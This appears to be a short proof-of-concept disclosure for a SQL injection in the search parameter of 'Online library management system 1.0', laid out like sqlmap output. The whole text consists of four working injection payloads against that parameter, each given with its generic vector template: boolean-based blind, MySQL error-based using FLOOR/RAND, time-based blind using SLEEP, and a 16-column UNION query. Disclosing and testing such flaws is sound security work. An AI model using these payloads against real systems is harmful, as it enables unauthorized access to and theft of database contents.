POC 1:
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: search=AA&Search=') AND 5208=5208#
Vector: AND [INFERENCE]#
POC 2:
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: search=aa&Search=') OR (SELECT 5630 FROM(SELECT COUNT(*),CONCAT(0x7162787171,(SELECT (ELT(5630=5630,1))),0x717a766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XONS
Vector: OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
POC 3:
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=aa&Search=') AND (SELECT 3884 FROM (SELECT(SLEEP(5)))baxK)-- uNHU
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
POC 4:
Type: UNION query
Title: MySQL UNION query (NULL) - 16 columns
Payload: search=aa&Search=') UNION ALL SELECT NULL,NULL,CONCAT(0x7162787171,0x7665436f41665177487458444d6c4358416d6a716869586c476d504b67647178695064414f4e444f,0x717a766a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Online library management system 1.0 search sql injection